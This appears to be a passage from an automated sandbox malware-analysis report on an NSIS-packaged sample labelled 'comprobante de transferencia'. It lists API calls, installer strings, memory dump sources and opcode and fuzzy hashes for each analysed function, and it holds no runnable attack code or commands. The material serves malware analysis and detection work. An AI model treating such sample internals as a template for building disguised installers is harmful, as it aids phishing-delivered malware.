                                            • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                            • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                            • EnableWindow.USER32(?,?), ref: 00403EC7
                                            • EnableWindow.USER32(?,?), ref: 00403EE2
                                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403EF8
                                            • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                            • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F17
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                            • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                            • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
                                            • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                            • String ID: &B
                                            • API String ID: 184305955-3208460036
                                            • Opcode ID: 7ec5d6d8830c14dd6c59fcd4d740f7405b1c3e71a87f8c2d624ec054901d1d72
                                            • Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
                                            • Opcode Fuzzy Hash: 7ec5d6d8830c14dd6c59fcd4d740f7405b1c3e71a87f8c2d624ec054901d1d72
                                            • Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                              • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                            • lstrcatW.KERNEL32(00436000,004226E8), ref: 004038E4
                                            • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,76BF3420), ref: 00403964
                                            • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                            • GetFileAttributesW.KERNEL32(004271A0), ref: 00403982
                                            • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 004039CB
                                              • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                            • RegisterClassW.USER32(004281A0), ref: 00403A08
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                            • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                            • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                            • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                            • API String ID: 1975747703-1918744475
                                            • Opcode ID: 4f9dca51b01f2e9a68abb90b62d3cff5debdd425081f11f9f2c149d9481a9570
                                            • Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
                                            • Opcode Fuzzy Hash: 4f9dca51b01f2e9a68abb90b62d3cff5debdd425081f11f9f2c149d9481a9570
                                            • Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404319
                                            • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                            • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040434A
                                            • GetSysColor.USER32(?), ref: 0040435B
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                            • lstrlenW.KERNEL32(?), ref: 0040437C
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                            • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                            • SendMessageW.USER32(00000000), ref: 004043FE
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                            • SetCursor.USER32(00000000), ref: 0040447D
                                            • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 00404492
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                            • SetCursor.USER32(00000000), ref: 004044A1
                                            • SendMessageW.USER32(00000111,?,00000000), ref: 004044D0
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: N$open
                                            • API String ID: 3615053054-904208323
                                            • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                            • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                            • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                            • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                            • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                            • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                            • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrcpyW.KERNEL32(00425D88,NUL), ref: 00405D58
                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00405EDC,?,?), ref: 00405D7C
                                            • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                              • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                              • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                            • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                            • wsprintfA.USER32 ref: 00405DC0
                                            • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                            • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                            • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                              • Part of subcall function 00405BEF: GetFileAttributesW.KERNEL32(00000003,00402E2E,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00405BF3
                                              • Part of subcall function 00405BEF: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,00434000,00403500,?), ref: 00405C15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                            • String ID: %ls=%ls$NUL$[Rename]
                                            • API String ID: 222337774-899692902
                                            • Opcode ID: fead4649acd3605223ce044578c367a532c9712ac73623ad44c2f3d2ee62ccb9
                                            • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                            • Opcode Fuzzy Hash: fead4649acd3605223ce044578c367a532c9712ac73623ad44c2f3d2ee62ccb9
                                            • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                            • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                            • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                            • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                            • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 004046E0
                                            • lstrcatW.KERNEL32(?,004271A0), ref: 004046EC
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                              • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
                                              • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406311
                                              • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                              • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406325
                                              • Part of subcall function 004062AE: CharPrevW.USER32(?,?,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406338
                                            • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,?,004206B8,?,?,000003FB,?), ref: 004047C1
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                              • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                              • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
                                              • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$&B
                                            • API String ID: 2624150263-2586977930
                                            • Opcode ID: 833f58d89de2f81fb1f01f1908bf740233fe299cde34ef739fcabdfbf8a79f2f
                                            • Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
                                            • Opcode Fuzzy Hash: 833f58d89de2f81fb1f01f1908bf740233fe299cde34ef739fcabdfbf8a79f2f
                                            • Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetVersion.KERNEL32(00000000,004216C8,?,004051B0,004216C8,00000000,00000000,?), ref: 004060FF
                                            • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 0040617D
                                            • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 00406190
                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                            • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 004061DA
                                            • CoTaskMemFree.OLE32(?), ref: 004061E5
                                            • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                            • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,004051B0,004216C8,00000000,00000000,?), ref: 00406263
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040614B
                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406203
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 900638850-730719616
                                            • Opcode ID: 72ae88432d73e88ed5369f503f10eb86e637b299afe91f447cbcbe3ad5255a4c
                                            • Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
                                            • Opcode Fuzzy Hash: 72ae88432d73e88ed5369f503f10eb86e637b299afe91f447cbcbe3ad5255a4c
                                            • Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402DFF
                                            • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,00434000,00403500,?), ref: 00402E1B
                                              • Part of subcall function 00405BEF: GetFileAttributesW.KERNEL32(00000003,00402E2E,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00405BF3
                                              • Part of subcall function 00405BEF: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,00434000,00403500,?), ref: 00405C15
                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00402E67
                                            Strings
                                            • Error launching installer, xrefs: 00402E3E
                                            • soft, xrefs: 00402EDC
                                            • Null, xrefs: 00402EE5
                                            • Inst, xrefs: 00402ED3
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                            • API String ID: 4283519449-527102705
                                            • Opcode ID: 850620337695c7023bdab0e7163ca5c9099db9983bf24f25e96f826daa09d327
                                            • Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
                                            • Opcode Fuzzy Hash: 850620337695c7023bdab0e7163ca5c9099db9983bf24f25e96f826daa09d327
                                            • Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                            • GetSysColor.USER32(00000000), ref: 0040417E
                                            • SetTextColor.GDI32(?,00000000), ref: 0040418A
                                            • SetBkMode.GDI32(?,?), ref: 00404196
                                            • GetSysColor.USER32(?), ref: 004041A9
                                            • SetBkColor.GDI32(?,?), ref: 004041B9
                                            • DeleteObject.GDI32(?), ref: 004041D3
                                            • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                            • Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
                                            • Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                            • Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
                                            • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
                                              • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405CE6
                                            • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                            • String ID: 9
                                            • API String ID: 163830602-2366072709
                                            • Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                            • Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
                                            • Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                            • Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                            • lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                            • lstrcatW.KERNEL32(004216C8,00403160), ref: 004051D4
                                            • SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 48f9730a8bf6011ea6331ab33cfc36a895b312cbace33bece7093b226dcfe4f2
                                            • Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
                                            • Opcode Fuzzy Hash: 48f9730a8bf6011ea6331ab33cfc36a895b312cbace33bece7093b226dcfe4f2
                                            • Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                            • GetMessagePos.USER32 ref: 00404A66
                                            • ScreenToClient.USER32(?,?), ref: 00404A80
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                            • Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
                                            • Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                            • Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
                                            • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                            • wsprintfW.USER32 ref: 00402D5D
                                            • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402D57
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
